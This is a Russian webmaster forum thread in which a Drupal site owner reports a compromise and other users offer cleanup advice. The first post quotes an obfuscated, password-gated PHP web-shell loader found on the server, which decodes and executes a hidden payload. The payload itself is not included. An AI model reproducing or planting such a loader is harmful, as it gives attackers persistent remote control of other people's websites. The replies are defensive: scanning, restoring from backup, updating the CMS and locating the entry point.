Взлом сайта кто-то может помочь?

idante
На сайте с 24.10.2012
Offline
70
2794

В общем, проблема оказалась глубже. Сайт вероятно взломали. Не вероятно даже, а точно. Итак, заметил с того, что перестали грузиться картинки с ошибкой 0. (drupal). Затем полез на сервер. Увидел там три странных файла. pass.php, mod_confi.php и mod_config.php. Удалил их. Поменял пароли все. Однако тут же появились ещё файлы ws.php и только что снова pas.php

Содержание файла такое: "<?php $_f__g_='base'.(128/2).'_de'.'code';$_f__g_=$_f__g_(str_replace("\n", '', 'Хренов Код
'
));$_f_g_=isset($_POST['_f_g_'])?$_POST['_f_g_']:(isset($_COOKIE['_f_g_'])?$_COOKIE['_f_g_']:NULL);if($_f_g_!==NULL){$_f_g_=md5($_f_g_).substr(MD5(strrev($_f_g_)),0,strlen($_f_g_));for($_f___g_=0;$_f___g_<15595;$_f___g_++){$_f__g_[$_f___g_]=chr(( ord($_f__g_[$_f___g_])-ord($_f_g_[$_f___g_]))%256);$_f_g_.=$_f__g_[$_f___g_];}if($_f__g_=@gzinflate($_f__g_)){if(isset($_POST['_f_g_']))@setcookie('_f_g_', $_POST['_f_g_']);$_f___g_=create_function('',$_f__g_);unset($_f_g_,$_f__g_);$_f___g_();}}?><form method="post" action=""><input type="text" name="_f_g_" value=""/><input type="submit" value="&gt;"/></form>

Никто не может помочь разобраться с проблемой?

Maxim-KL
На сайте с 26.01.2011
Offline
350
#1

idante, В помощь вам AI-Bolit, сканируйте а потом смотрите отчет что там за кака у вас.

Мои услуги по прогонам: ✅Качественный ручной статейный прогон по базе сайтов с ИКС10+ (maximgroups.net/progon-statejnyj) ✅Прогон Максимум - Все включено, 300+ качественных ссылок (maximgroups.net/progon-maksimum)
idante
На сайте с 24.10.2012
Offline
70
#2

Теперь не могу войти даже через /user/login на сайт

---------- Добавлено 10.08.2015 в 19:52 ----------

Через users зашел. И вот, что выдало. Что я под пользователем Артем Подчернин https://www.facebook.com/artem.podchernin.5?ref=br_rs

Что бы это могло значить?

Andreyka
На сайте с 19.02.2005
Offline
822
#3

Вам нужен бекап базы и файлов

Переустановите дивжок и модули заново, накатите базу, сделайте апгрейт до последней версии

Не стоит плодить сущности без необходимости
Maxim-KL
На сайте с 26.01.2011
Offline
350
#4

Andreyka, Восстановить из бекапа это конечно просто, но желательно до этого найти дыру чере которую залили всю эту каку и прикрыть ее. А то можно восстановить и через сутки снова через ту же дыру...

K5
На сайте с 21.07.2010
Offline
209
#5

как предложили выше, проверяете ай-болитом, затем обновляете движок и модули, затем меняете пароли.

P.S. для "помочь разобраться" есть раздел работы.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
iHead
На сайте с 25.04.2008
Offline
137
#6

Если у вас сайт на Drupal и вы его давно не обновляли, то в этом и причина.

Рекомендуемый хостинг партнер 1С-Битрикс (https://www.ihead.ru/bitrix/), PHP-хостинг (https://www.ihead.ru/php/), доверенный партнер RU-CENTER (https://www.ihead.ru/news/573.html), официальный представитель REG.RU в Кирове (https://www.ihead.ru/news/851.html)
M
На сайте с 26.11.2008
Offline
51
#7

У вас где то в коде шелл конструктор, который инициализируется вместе с друпалом.

Нужно рыть и искать. Поднимать логи, доступ в админку закройте через htaccess, хотя при наличии шелла внутри сайта, это вряд ли поможет.

Файлы лучше не просто удалять, а копии делать, чтобы понять для каких целей взлом сайта. Или там связка будет или шелл под спам или слив трафа - от этого уже плясать дальше.

Веб программирование, создание плагинов под любые CMS, разработка сайтов с нуля, помочь в настройке хостинга и переездах, очистка от вирусов и другие услуги для ваших проектов (http://www.maxgal.com)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий